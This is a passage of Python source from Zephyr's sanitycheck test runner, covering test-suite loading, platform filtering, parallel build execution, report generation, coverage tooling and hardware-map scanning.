if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
eleTestsuite = eleTestsuites.findall(f'testsuite/[@name="{p}"]')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message="Skipped")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Lcov()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
